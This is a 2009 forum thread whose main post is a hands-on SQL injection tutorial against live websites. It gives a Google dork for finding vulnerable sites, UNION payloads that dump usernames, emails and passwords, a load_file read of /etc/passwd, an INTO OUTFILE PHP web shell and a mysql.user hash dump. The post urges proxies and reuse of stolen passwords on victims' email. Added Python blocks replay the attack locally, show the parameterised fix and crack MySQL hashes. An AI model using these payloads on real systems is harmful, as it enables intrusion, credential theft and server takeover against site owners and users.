IT Security and Insecurity Portal

The Best SQL Injection Tutorial You'll Ever Find

Posted: Sat May 09, 2009 10:41 pm

tehhunter
Valuable expert
Joined: Nov 19, 2008
Posts: 261

I decided to write this because I am in exams right now, and frankly I'm going crazy studying. So this is my quick thirty-minute sideline to demonstrate how to properly find a website that's injectable, and then inject it.
DISCLAIMER: You are doing this on your own; I am not accountable! I recommend always using a proxy or two!
Currently this exploit works on roughly 443 different websites (or so Google tells me). Once you learn it, you can quite literally copy and paste the end and hack any one of them in a matter of seconds (I just did it, it was pretty fun).
STEP ONE: FINDING AN EXPLOITABLE WEBSITE
This step is easier said than done. Oftentimes you'll find that you just can't find a website that is exploitable, and thus can't practice. Well then, Google is your friend. Now, while I am not personally going to give you any exploitable webpages in this guide, suffice it to say you will definitely and very easily find them if you continue to read this.
Google allows the usage of search manipulators, a key one of which is 'inurl:'. This will only return websites with whatever follows that statement in the URL. For example, if I do a search for:
Code:
inurl:.php
it will only show pages with .php in the URL (usually at the end).
Now we are going to use this to our advantage. See the following search query:
Code:
inurl:php -inurl:asp -inurl:htm -inurl:html inurl:graphics_index.php inurl:cat= intitle:"Myspace Graphics"
This is a query I have specifically constructed to only show websites that use a specific web site manager, one I know has a commonly and easily exploitable hole. Go ahead and try it now; I'll wait. By the way, while I'm waiting, I'll just inform you that this is a technique called 'Google dorking' and you can read much more about that elsewhere. Okay, now pick any one of the sites that show up. Got it? Good!
STEP TWO: FINDING AN EXPLOITABLE PARAMETER
The best and easiest way to find an exploitable parameter (which you will need for SQL injection) is to simply throw a single quote ( ' ) into the parameter's value. So if you had:
Code:
http://www.mypage.com/mypage.php?cat=342
you would simply change it to:
Code:
http://www.mypage.com/mypage.php?cat=342'
Now if an error appears on the page, you are in luck, and the odds are greatly in your favor that this website is exploitable. The error should look a little something like:
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '...<some code here>...'.
Alright, now for the specific website that you are on right now, odds are that it does employ this specific website system (usually for hosting MySpace templates or something like that). So let's mess around with this and append our own query. An important note: change the value of whatever parameter you are exploiting (in our case it will be the 'cat' parameter) to -1. Databases do not usually store negative entries, so to ensure we do not receive any false positives, let us eliminate the possibility.
What we are going to be doing is piggy-backing on top of the query the webpage is using, something fully against the design intentions of whoever made it. The keyword we are going to be using is UNION. UNION essentially joins together two queries and merges their results. Since the first query (if you changed the parameter to -1) will return nothing, we are only going to see the results from our own query.
Also, one last thing for this: I removed every other parameter, because they are there to control how many results appear per page. We want all results to appear on one page, right? So graphics_index.php?pageNum_lays=0&cat=1&totalRows_lays=0 would be shortened to just graphics_index.php?cat=1.
STEP THREE: EXPLOITING THE HOLE
Alright, so let's get on with hacking. You are now on the graphics_index.php page, and you are exploiting the 'cat' parameter. Now try the following:
Code:
graphics_index.php?cat=-1 UNION SELECT 1--
To help you understand this: you are joining together two queries. However, you'll notice you are getting an error, something like 'different number of columns' in the two queries. That is because to merge the results of the two queries, we must match the same number of columns. So we are going to sequentially increment the number of columns until we do not receive any more errors! (Also, a quick note: the -- at the end of the query is SQL's syntax for a comment, so anything after the -- will be ignored, which is helpful if the original query had annoying compromising code after it!)
Code:
graphics_index.php?cat=-1 UNION SELECT 1--
graphics_index.php?cat=-1 UNION SELECT 1,2--
graphics_index.php?cat=-1 UNION SELECT 1,2,3--
...
Continue adding in this fashion until you do not get an error about 'different number of columns'. Congrats! Odds are you received a page loading as normal, yes? You should probably (in this specific case) have ten columns total. If you didn't, you might have done something wrong, so try this on a different site. Otherwise, scroll down the page and start to look for numbers, any numbers. See some? Or in our case, one? Right!
So we are going to be using that number (in every attempt I did, it was 3), or rather its position in the query we have created. Now we are at one of the two last stages.
If the server is using MySQL version 5.0.0 or greater, there will be a database called INFORMATION_SCHEMA that contains some very valuable information for us. So, let's try harnessing it! A quick note beforehand: concat() is an SQL function that allows us to join together relevant bits of information, and it will prove quite handy for us.
Code:
graphics_index.php?cat=-1 UNION SELECT 1,2,concat(TABLE_SCHEMA,char(58),TABLE_NAME),4,5,6,7,8,9,10 FROM INFORMATION_SCHEMA.TABLES--
This database, INFORMATION_SCHEMA, contains the basic layout of every database and table on the server that is visible to us. So as the page loads, you should see a fair amount of entries load on the page in the format of DATABASENAME:TABLENAME. We are looking for a users table because that's where the good information is. Find it? Good! It probably is called users (or if it isn't, then substitute the name you found for 'users' in the rest of this tutorial).
Okay, so we have our targeted table, but now we need to know the layout of that specific table to inject it. Enter INFORMATION_SCHEMA.COLUMNS, which is much like the TABLES table, except it contains all the information on the columns. So now, we try the following query...
Code:
graphics_index.php?cat=-1 UNION SELECT 1,2,concat(table_schema,char(58),table_name,char(58),column_name),4,5,6,7,8,9,10 FROM INFORMATION_SCHEMA.COLUMNS--
This should provide all the databases' column names in a format like DATABASENAME:TABLENAME:COLUMNNAME. So scroll down and find your users table among the results. Found it? We are going to be interested in the username field, the password field, and if you like (as I do), the email field. Oftentimes, users will use the same passwords on many sites, so there's a decent chance this password will work for their email. So jot down the column names. In my case, the username field was 'uname', the password field was 'pass', and the email field was 'email'. So now we are nearing the end!
STEP FOUR: THE FINAL EXPLOIT
Here we are, at the end, one last query awaits you. I strongly suggest you guess on your own before just giving in and using the code that I give you below. Seriously! The best way to learn is on your own, and if you get it yourself, you will become immeasurably better than I could ever teach you.
Alright, if you didn't, that's fine too. Here we go. We are going to combine all the information we have gotten above into the final query:
Code:
graphics_index.php?cat=-1 UNION SELECT 1,2,concat(uname,char(58),email,char(58),pass),4,5,6,7,8,9,10 FROM users--
And there you have it, you have completed your first SQL injection. You should be provided with a list of users' information from that site in the format of USERNAME:EMAIL:PASSWORD.
I hope this proved helpful to some of you guys, I know that SQL injection was daunting for me at first, but it is really pretty easy once you get the hang of it (as I'm sure waraxe can attest). If you have any questions, just leave 'em, and I'll try to answer them as best I can.
STEP FIVE: TRY OTHER THINGS (OPTIONAL)
There are still a few tricks worth trying while you are learning SQL injection. Here are three of my favorites:
1) Replace the number you used above with load_file('/etc/passwd') or any other file you'd like to view. If you are lucky it will work; I would guess this works on about one in four sites. Protip: when you are initially scouting for errors, if you get an error that reveals a path (it would be in bold, looking like "Error: /var/www/MaybeTheSiteName.com/html/index.php on line 63" or something), you can use that path inside of load_file() and thus load pages' source from the website. Useful if you want to try to load any .htaccess or .htpasswd file on the site.
Example:
Code:
graphics_index.php?cat=-1 UNION SELECT 1,2,load_file('/etc/passwd'),4,5,6,7,8,9,10--
OR, if the server is actively blocking your quote marks (" or '), then you might be able to get around it using the SQL Char Encoder that you'll find a link to on the top left side of this page (under Tools). Try both the MySQL encodings.
2) Use INTO OUTFILE to try to create a shell. If you were able to get the full path disclosure (like that from #1), then you may be able to write to the web directory, and if that is so, you could create a web shell to execute your own commands on the server. For example:
Code:
graphics_index.php?cat=-1 UNION SELECT 1,2,'<?php system($_GET["cmd"]); ?>',4,5,6,7,8,9,10 INTO OUTFILE '/var/www/MaybeTheSiteName.com/html/myshell.php'--
OR again, if the site is hassling you over usage of quotation marks (" or '), then you might be able to get away with either the hex encoder or char() encoder from Tools -> SQL Char Encoder on the top left of this page.
3) Try to access mysql.user. This database contains the usernames and passwords and access rights associated with the MySQL server on this server. If it is visible to you (as in it shows up during the stage of the hack earlier where you injected to view INFORMATION_SCHEMA.TABLES), you can view it, and thus exploit it and possibly gain a strong measure of control over the server.
Example:
Code:
graphics_index.php?cat=-1 UNION SELECT 1,2,concat(Host,char(58),User,char(58),Password),4,5,6,7,8,9,10 FROM mysql.user--
If you find any results from this, I believe (though I might be mistaken) that the encryption is MySQL encryption, which is essentially a double hashing via SHA-1 (e.g. SHA1(SHA1('The Password'))). Use this information to crack it, or just post it here!
I will be continuing to update this as I remember more stuff, but also please feel free to post here and I'll add any good bits of information (with the right credit). Thanks!
Last edited by tehhunter on Sun May 10, 2009 6:50 pm; edited 2 times in total |
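The procedure from Steps 2 to 4 of the post above (quote test, column counting, catalogue enumeration, credential dump), replayed as an added example against an in-memory SQLite database beside the parameterised query that defeats it. This is not code from the original post or from the web application it targets. SQLite stands in for MySQL, so the catalogue is sqlite_master rather than INFORMATION_SCHEMA.TABLES and string joining uses || rather than concat(); the schema, the 'graphics' and 'users' tables and the rows in them are constructed for the demo.

```python
"""Added example (not from the original post): UNION injection against a
string-built SQLite query, next to the bound-parameter version that stops it.
SQLite substitutes for MySQL; schema and data below are constructed."""
import sqlite3

# Constructed schema: 'graphics' has ten columns, matching the ten-column
# UNION in the post, and 'users' carries the uname/pass/email columns it names.
SCHEMA = """
CREATE TABLE graphics (id INTEGER, cat INTEGER, title TEXT, c4 TEXT, c5 TEXT,
                       c6 TEXT, c7 TEXT, c8 TEXT, c9 TEXT, c10 TEXT);
CREATE TABLE users (uname TEXT, pass TEXT, email TEXT);
INSERT INTO graphics VALUES (1, 342, 'glitter', '', '', '', '', '', '', '');
INSERT INTO users VALUES ('alice', 'hunter2', 'alice@example.invalid');
"""


def open_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def graphics_vulnerable(db, cat):
    """The bug the post exploits: the URL parameter is pasted into the SQL text.
    A stray quote raises sqlite3.OperationalError, which is the
    'error in your SQL syntax' signal from Step 2."""
    sql = "SELECT * FROM graphics WHERE cat=" + cat
    return db.execute(sql).fetchall()


def graphics_safe(db, cat):
    """Hardened form: the value is bound as a parameter, so it is never parsed
    as SQL.  The injected string simply matches no row."""
    return db.execute("SELECT * FROM graphics WHERE cat=?", (cat,)).fetchall()


def is_injectable(db):
    """Step 2: does a trailing single quote break the query?"""
    try:
        graphics_vulnerable(db, "342'")
    except sqlite3.OperationalError:
        return True
    return False


def find_column_count(db, max_cols=20):
    """Step 3: grow 'UNION SELECT 1,2,...' until the column-count error stops."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        try:
            graphics_vulnerable(db, f"-1 UNION SELECT {cols}--")
            return n
        except sqlite3.OperationalError:
            continue
    return None


def _inject(db, expr, source):
    """Puts expr in column 3 (the position the post saw echoed) and pads the
    rest; cat=-1 empties the original SELECT so only our rows come back."""
    n = find_column_count(db)
    cols = ["1", "2", expr] + [str(i) for i in range(4, n + 1)]
    payload = f"-1 UNION SELECT {','.join(cols)} FROM {source}--"
    return [row[2] for row in graphics_vulnerable(db, payload)]


def list_tables(db):
    """The INFORMATION_SCHEMA.TABLES stage, via SQLite's sqlite_master."""
    return _inject(db, "name", "sqlite_master WHERE type='table'")


def dump_users(db):
    """Step 4: uname:email:pass rows, the post's final query."""
    return _inject(db, "uname || ':' || email || ':' || pass", "users")


if __name__ == "__main__":
    db = open_db()
    print("injectable:", is_injectable(db))
    print("columns:", find_column_count(db))
    print("tables:", list_tables(db))
    print("users:", dump_users(db))
    print("safe query, same payload:", graphics_safe(db, "-1 UNION SELECT 1,2,3--"))
```

Note that graphics_safe gets exactly the same payload string and returns nothing: with a bound parameter the database compares the whole string against the cat column and never sees a UNION. That single change, not input filtering or quote encoding, is the fix for every query in the post.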
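An added example for the mysql.user hashes mentioned in Step 5, item 3 of the post above; it is not code from the original post. MySQL 4.1 and later store PASSWORD() as a '*' followed by the uppercase hex of SHA1(SHA1(pw)), where the inner SHA1 is the raw 20-byte digest rather than its hex text. The Host:User:Password rows and the wordlist below are constructed; the 16-hex-character hashes of pre-4.1 servers use a different algorithm and are rejected rather than handled.

```python
"""Added example (not from the original post): recompute MySQL's 4.1+
PASSWORD() and check captured mysql.user rows against a wordlist.
Sample rows and wordlist are constructed."""
import hashlib


def mysql_native_password(password: str) -> str:
    """MySQL 4.1+ PASSWORD(): '*' + hex(SHA1(SHA1(pw))), inner digest raw."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def parse_user_row(row: str):
    """Splits one Host:User:Password line from the post's concat() query.
    Password is last, so only the first two ':' are separators."""
    host, user, hashed = row.split(":", 2)
    return host, user, hashed


def crack(hashed: str, wordlist):
    """Returns the first wordlist entry whose hash matches, else None."""
    if len(hashed) != 41 or not hashed.startswith("*"):
        raise ValueError("not a MySQL 4.1+ native password hash: %r" % hashed)
    target = hashed.upper()
    for word in wordlist:
        if mysql_native_password(word) == target:
            return word
    return None


# Constructed sample: rows shaped like the post's mysql.user output.
SAMPLE_ROWS = [
    "localhost:root:" + mysql_native_password("password"),
    "%:webapp:" + mysql_native_password("Tr0ub4dor&3"),
]
SAMPLE_WORDLIST = ["123456", "password", "letmein", "qwerty"]


def crack_rows(rows=SAMPLE_ROWS, wordlist=SAMPLE_WORDLIST):
    """Maps each user to its recovered password, or None on a miss."""
    results = {}
    for row in rows:
        _, user, hashed = parse_user_row(row)
        results[user] = crack(hashed, wordlist)
    return results


if __name__ == "__main__":
    print(crack_rows())
```

The check is unsalted and a single SHA-1 pair per candidate, which is why these hashes fall so quickly to a wordlist; it is also why a hash of the form '*' plus 40 hex digits lifted from mysql.user should be treated as the password itself for incident-response purposes.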
Posted: Sat May 09, 2009 11:11 pm

delta
Advanced user
Joined: Jan 11, 2009
Posts: 60

Nice tuto, but I was expecting more when I saw: "The Best SQL Injection Tutorial You'll Ever Find" hehehe

Posted: Sat May 09, 2009 11:19 pm

tehhunter
Valuable expert
Joined: Nov 19, 2008
Posts: 261

delta wrote:
> Nice tuto, but I was expecting more when I saw: "The Best SQL Injection Tutorial You'll Ever Find" hehehe

I could have gone into excruciating detail, but I figured that if you are on this site, you probably do know a thing or two already about injection. This was more so a tutorial about being able to find websites and exploit them with a few common simple tricks.

Posted: Sun May 10, 2009 11:38 am

delta
Advanced user
Joined: Jan 11, 2009
Posts: 60

You don't need a lot of details; even if I didn't know anything about SQL injection I would understand this tuto... or I think so.
Ah, and this dork doesn't have a lot of sites (20 +/-), but it is good if people want to practice.

Posted: Sun May 10, 2009 6:51 pm

tehhunter
Valuable expert
Joined: Nov 19, 2008
Posts: 261

Yeah, I just updated to add a few additional things that are fun to know. I think this will be a work-in-progress thing as I remember more and more stuff. Read the bottom, by the way, because if anyone has any good tips to add, I'd be more than willing to add them with due credit. Thanks!

www.waraxe.us Forum Index -> Sql injection
Powered by phpBB © 2001-2008 phpBB Group